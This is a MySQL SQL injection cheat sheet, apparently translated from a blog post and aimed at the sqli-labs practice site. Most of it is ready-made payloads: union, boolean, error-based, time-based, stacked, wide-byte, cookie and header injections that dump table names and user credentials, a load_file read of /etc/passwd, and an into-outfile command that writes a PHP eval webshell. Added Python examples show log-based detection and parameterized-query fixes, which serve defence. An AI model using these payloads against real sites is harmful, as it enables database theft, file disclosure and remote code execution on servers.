MySQL injection summary

0x01 Differences between MySQL versions below 5.0 and 5.0 and above

MySQL 5.0 and above ship with a database named information_schema, which holds metadata about every other database the MySQL server maintains: database names, tables, table columns and their data types, access privileges to the databases, and so on. Versions below 5.0 have no such database.

information_schema

System database that records the databases, tables, columns and user privilege information of the current server.

SCHEMATA

Stores basic information about every database on the MySQL server, including the database name, path and character set (encoding).

Query the database names: http://localhost/sqli-labs/Less-2/index.php?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata #

TABLES

Stores information about tables in MySQL, including whether a table is a base table or a system table, its storage engine, its number of rows, its creation time and its last update time.

List the tables of the security database: http://localhost/sqli-labs/Less-2/index.php?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' #

COLUMNS

Stores the column information of every table: for each column, the table it belongs to, its position within the table, its data type, its character set, its privileges, its comment and so on.

List the columns of the users table: http://localhost/sqli-labs/Less-2/index.php?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' #

0x02 Common information functions

Current user: user()

Database version: version()

Database name: database()

Operating system: @@version_compile_os

0x03 Basic manual injection flow

3.1 Get the number of columns

order by n

3.2 Get the names of all databases

select 1,2,schema_name from information_schema.schemata

3.3 Get the current database name

select 1,2,3,database()

3.4 Get the tables of the current database

select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

or:

select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1

3.5 Get the columns of a table

select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'

3.6 Get the values of the columns

select 1,group_concat(username,password) from users

3.7 Read files

select load_file('/etc/passwd')

Prerequisites:

    1. The file is readable with the current permissions

    2. The file exists on the server

    3. The path is complete (absolute)

    4. The file size is less than max_allowed_packet

    5. The current database user has the FILE privilege

    6. secure_file_priv is empty; if it is set to a directory, only files in that directory can be read

3.8 Write a file

select '<?php @eval($_POST[c]);?>' into outfile '/var/www/html/shell.php'

Prerequisites:

    1. The target directory must be writable

    2. The current database user must have the FILE privilege

    3. The destination file must not already exist

    4. secure_file_priv is empty

    5. The path is complete (absolute)

0x04 Common injection methods

4.1 Union injection

UNION joins the results of two SQL statements. When the injected parameter value does not exist in the database, the first statement's result set is empty, so the result of the second (injected) statement is what gets displayed.

Example:

id=-1' union select 1,2 --+

4.2 Boolean injection

Uses logical conditions: whether the injected expression is true or false decides what the page returns.

    • left(database(), 1) > 's'

    • ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101 --+

    • ascii(substr((select database()), 1,1))=98

    • ord(mid((select ifnull(cast(username as char), 0x20) from security.users order by id limit 0,1), 1, 1)) > 98 %23

      Explanation: mid(a, b, c) takes c characters from string a starting at position b; ord() works like ascii() and returns the character's code.

    • regexp (regular expression) injection

      select user() regexp '^[a-z]'

    • like (pattern matching) injection

      select user() like 'ro%'

4.3 Error-based injection

The payload is built so that the wanted information is echoed back inside the error message, using floor, updatexml, extractvalue, NAME_CONST, error-based double query injection and similar methods.

    • floor

      union select 1, count(*), concat(0x3a, 0x3a, (select user()), 0x3a, 0x3a, floor(rand(0)*2)) as a from information_schema.columns group by a

    • updatexml (length limit: at most 32 characters are returned)

      ?id=1 and updatexml(1, concat(0x7e, (select @@version), 0x7e),1)

    • extractvalue (length limit: at most 32 characters are returned)

      ?id=1 and extractvalue(1, concat(0x7e, (select @@version),0x7e))

    • NAME_CONST

      ?id=261 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)

    • Error based Double Query Injection

      ?id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1

    • exp (MySQL 5.5.5 and above)

      id=1 and (select exp(~(select * from(select user())x)))

    • polygon

      id=1 and polygon((select * from(select * from(select user())a)b))

4.4 Time-based injection

Delay (sleep-based) injection:

?id=1 and if(ascii(substr(database(),1,1))>115, 1, sleep(5))
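As an added example (not part of the original post), the following Python scans constructed web-server access-log lines for the payload shapes described in 4.1 to 4.5 and tags each request with the technique family it resembles; the log lines, the regular expressions and the function names are assumptions made here.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original page); the query
# strings reuse the union, error-based and time-based payload shapes above.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=-1%20union%20select%201,2,'
    'group_concat(schema_name)%20from%20information_schema.schemata%20%23 HTTP/1.1" 200 640',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=1%20and%20updatexml(1,'
    'concat(0x7e,(select%20@@version),0x7e),1) HTTP/1.1" 500 120',
    '10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?id=1%20and%20if(ascii('
    'substr(database(),1,1))%3E115,1,sleep(5)) HTTP/1.1" 200 512',
]

# One pattern per technique family from sections 4.1 to 4.5, applied to the
# URL-decoded, lower-cased query string.
SIGNATURES = {
    "union":   re.compile(r"\bunion\b[\s/*]*(?:all\s+)?select\b"),
    "schema":  re.compile(r"\binformation_schema\b"),
    "error":   re.compile(r"\b(?:updatexml|extractvalue|name_const|exp|polygon)\s*\("
                          r"|\bfloor\s*\(\s*rand\s*\("),
    "time":    re.compile(r"\b(?:sleep|benchmark)\s*\("),
    "boolean": re.compile(r"\b(?:ascii|ord|substr|mid|left)\s*\(.*?(?:[<>=]|\bregexp\b|\blike\b)"),
    "file":    re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b"),
    "stacked": re.compile(r";\s*(?:select|insert|update|delete|drop)\b"),
}

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP')

def classify(query_string):
    """Return the set of technique tags whose signature matches the decoded query."""
    decoded = unquote_plus(query_string).lower()
    return {tag for tag, rx in SIGNATURES.items() if rx.search(decoded)}

def scan(lines):
    """Return (client_ip, path, tags) for each request that trips at least one signature."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        path, _, query = m.group(2).partition("?")
        tags = classify(query)
        if tags:
            hits.append((m.group(1), path, tags))
    return hits
```

Running scan(LOG_LINES) flags the three requests from 10.0.0.7 and leaves the plain id=1 request alone; signatures like these are a triage aid for log review, not a substitute for parameterized queries in the application.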

4.5 Stacked query injection

Stacked queries differ from union queries in the statement that follows the original one: a union injection can only append a further SELECT, whereas stacked queries (statements separated by ;) can execute arbitrary statements.

Example:

id=1';select if(substr(user(),1,1)='r', sleep(3), 1)%23

Note: stacked injection cannot be used against Oracle.

4.6 Second-order injection

  How it works: when the data is first inserted into the database, special characters are escaped with addslashes or by means of get_magic_quotes_gpc, but the value written to the database still holds the original characters. For example, for the input ', addslashes produces \', which is what is inserted, and the database stores '.

  Once the data is stored, developers assume it is trustworthy by default; the next time it is needed, the tainted value is read straight from the database and used in a query without further checking or escaping, which causes second-order SQL injection.
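Added example (not from the original post): Python with the standard-library sqlite3 module standing in for MySQL, showing the two-step flow described above, where escaping at insert time does not protect a later query that reuses the stored value, beside the parameterized version that does; the table layout and function names are assumptions.

```python
import sqlite3

# sqlite3 (stdlib) stands in for MySQL so the example runs offline; the defect
# is in how the application assembles its SQL, not in the engine.

def escape(value):
    """Stand-in for addslashes-style escaping: SQL-standard quote doubling."""
    return value.replace("'", "''")

def new_db():
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);"
        "INSERT INTO users(username, password) VALUES ('admin', 'admin-secret');"
    )
    return db

def register(db, username, password):
    # First query: the input is escaped, so this INSERT is not injectable ...
    cur = db.execute(f"INSERT INTO users(username, password) "
                     f"VALUES ('{escape(username)}', '{escape(password)}')")
    return cur.lastrowid  # ... but the stored username keeps its raw quote.

def stored_username(db, user_id):
    return db.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()[0]

def change_password_vulnerable(db, user_id, new_password):
    # Second query: the username read back from the table is trusted and
    # concatenated unescaped. A stored "admin'-- " closes the quote and
    # comments out the rest, so the UPDATE hits the admin row instead.
    name = stored_username(db, user_id)
    db.execute(f"UPDATE users SET password = '{escape(new_password)}' WHERE username = '{name}'")

def change_password_safe(db, user_id, new_password):
    # Hardened: every query is parameterized, so the stored value is bound as
    # data no matter where it came from.
    name = stored_username(db, user_id)
    db.execute("UPDATE users SET password = ? WHERE username = ?", (new_password, name))

def password_of(db, username):
    return db.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()[0]

def demo(change_password):
    """Register a user named "admin'-- " and let it change its own password."""
    db = new_db()
    uid = register(db, "admin'-- ", "x")
    change_password(db, uid, "changed")
    return password_of(db, "admin"), password_of(db, "admin'-- ")
```

demo(change_password_vulnerable) ends with the admin password overwritten, while demo(change_password_safe) changes only the registering user's own row.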

4.7 Wide-byte injection

Conditions of use:

    • The query parameter is wrapped in single quotes, and single quotes in the input are escaped

    • The database uses GBK encoding

      id=-1%df' union select 1, user(),3%23

      Under these conditions the single quote ' is escaped with a backslash (%5c), giving %df%5c%27. In GBK encoding %df%5c forms a single two-byte traditional Chinese character, so the backslash is absorbed into that character and the single quote is left unescaped.
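Added example (not from the original post): Python's gbk codec stands in for a MySQL connection using the gbk character set, showing why byte-wise escaping in the style of addslashes leaves the quote live after %df, and how escaping after decoding with the connection charset avoids it; the function names and sample bytes are assumptions.

```python
# Wide-byte escaping failure, demonstrated with Python's gbk codec standing in
# for a MySQL connection whose character set is gbk (constructed example).

INJECTED = b"\xdf'"      # the %df' prefix from the payload above, as raw bytes
LEGIT = b"\xdf\x5c'"     # a valid two-byte GBK character whose trail byte is 0x5C, then a quote

def addslashes(data):
    """Byte-oriented escaping in the style of PHP addslashes(): no charset awareness."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)  # prepend a backslash
        out.append(b)
    return bytes(out)

def escape_bytewise_then_decode(raw):
    """What the server sees: bytes escaped blindly, then parsed as GBK.
    For the INJECTED bytes the backslash (0x5C) is swallowed as the trail byte of 0xDF."""
    return addslashes(raw).decode("gbk", errors="replace")

def escape_charset_aware(raw):
    """Decode with the connection charset first, then escape characters.
    Returns None for input that is not valid GBK instead of forwarding it."""
    try:
        text = raw.decode("gbk")
    except UnicodeDecodeError:
        return None
    return text.replace("\\", "\\\\").replace("'", "\\'")

def quote_is_live(fragment):
    """True if the fragment contains a single quote not protected by a backslash."""
    i = 0
    while i < len(fragment):
        if fragment[i] == "\\":
            i += 2  # skip the escaped character
            continue
        if fragment[i] == "'":
            return True
        i += 1
    return False
```

In practice the robust fix is to set the connection character set explicitly and use parameterized queries, since the server, not the application, decides how the bytes are interpreted.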

4.8 Cookie injection

Cookie: id=1 and 1=1

4.9 Base64 injection

The parameter is transmitted base64-encoded, so the payload is base64-encoded before the request is sent.

4.10 XFF injection

XFF, the X-Forwarded-For header, carries the real IP address of the client; when the application uses it unchecked it becomes an injection point.

X-Forwarded-For: 127.0.0.1' select 1,2,user()


Source: www.cnblogs.com/khuntor/p/11526248.html